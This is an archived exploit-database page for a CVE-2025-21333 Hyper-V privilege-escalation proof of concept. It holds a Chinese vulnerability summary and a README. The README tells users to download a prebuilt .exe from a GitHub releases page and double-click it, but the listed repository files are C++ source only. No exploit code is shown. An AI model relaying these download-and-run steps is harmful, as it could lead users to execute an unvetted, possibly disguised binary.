Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-21333 PoC — Microsoft Hyper-V 安全漏洞

Source
Associated Vulnerability
Title:Microsoft Hyper-V 安全漏洞 (CVE-2025-21333)
Description:Microsoft Hyper-V是美国微软(Microsoft)公司的一个应用程序。一种系统管理程序虚拟化技术,能够实现桌面虚拟化。 Microsoft Hyper-V存在安全漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows 10 Version 21H2 for x64-based Systems,Windows 11 Version 22H2 for ARM64-based Systems,Windows 11 Version 22H2 for x64-based Syst
Description
🛠️ Exploit CVE-2025-21333 in vkrnlintvsp.sys with this proof of concept, aimed at demonstrating potential threats on Windows 11 systems.
Readme
# 🚀 CVE-2025-21333-POC - Simple Steps to Use the Exploit

## 🌟 Overview

CVE-2025-21333-POC is a proof-of-concept exploit that demonstrates a heap-based buffer overflow. It uses WNF state data and I/O ring IOP_MC_BUFFER_ENTRY. This tool helps users understand the security vulnerability involved and provides basic functionality for demonstration purposes.

## 🔗 Download the Application

[Download CVE-2025-21333-POC](https://github.com/pradip022/CVE-2025-21333-POC/releases)

## 🚀 Getting Started

Follow these steps to download and run the application:

1. **Open Your Web Browser**  
   Use any web browser installed on your computer, such as Chrome, Firefox, or Edge.

2. **Visit the Releases Page**  
   Go to the releases page by clicking the link below:  
   [Download CVE-2025-21333-POC](https://github.com/pradip022/CVE-2025-21333-POC/releases)

3. **Find the Latest Version**  
   Look for the latest version of the application. It will usually be at the top of the page.

4. **Download the Application**  
   Click on the link for the latest release. This will start the download process for the application. The filename will look similar to `CVE-2025-21333-POC-v1.0.exe`.

5. **Locate the Downloaded File**  
   Once the download is complete, navigate to your computer's Downloads folder or the location where your browser saves files.

6. **Run the Application**  
   Double-click on the downloaded file. This will open the application. Follow any on-screen instructions to proceed.

## 💻 System Requirements

To ensure the best experience, please make sure your system meets the following requirements:

- Operating System: Windows 10 or later
- Processor: Intel Core i3 or equivalent
- Memory: 4 GB RAM minimum
- Disk Space: 100 MB available space

## 🔧 Features

CVE-2025-21333-POC includes the following features:

- Demonstrates heap-based buffer overflow vulnerability.
- Outlines how WNF state data is involved in the exploit.
- Runs smoothly on supported Windows operating systems.
- User-friendly interface for basic interaction.

## 📖 Usage Instructions

1. **Launching the Application**  
   After double-clicking the application file, the main window will appear. Familiarize yourself with the interface. 

2. **Using the Exploit**  
   Follow any prompts in the application to execute functions. Keep in mind this is for educational purposes and may require specific user actions to demonstrate its effect.

3. **Exit the Application**  
   When done, click on the "Exit" button or close the window using the standard close option.

## 🔒 Important Notes

- This tool is intended for educational use to demonstrate security vulnerabilities. Please use responsibly.
- Ensure you have permission to test any systems using this software, as unauthorized use can lead to legal issues.

## 📁 Support and Contributing

If you encounter issues or need assistance, please visit the GitHub repository. You can raise an issue or check the discussion forums for help.

To contribute, feel free to fork the repository, make your changes, and submit a pull request for review.

## 📞 Contact Information

For any questions or feedback regarding the application, please contact the repository maintainer:

- **Email:** [maintainer@example.com](mailto:maintainer@example.com)

## 🌐 More Resources

For more information on CVE-2025-21333 and related topics, you can visit:

- [CVE Details](https://www.cvedetails.com/)
- [OWASP Foundation](https://owasp.org/)

Thank you for using CVE-2025-21333-POC!
File Snapshot

[4.0K] /data/pocs/770755dca2e1173c2012f5e174cbd054cc0f5f98 ├── [4.0K] CVE-2025-21333-POC │   ├── [ 62K] CVE-2025-21333-POC.cpp │   ├── [6.6K] CVE-2025-21333-POC.vcxproj │   ├── [1.2K] CVE-2025-21333-POC.vcxproj.filters │   ├── [1.5K] Hexdump.hpp │   └── [8.9K] wnf.h ├── [1.4K] CVE-2025-21333-POC.sln └── [3.5K] README.md 1 directory, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.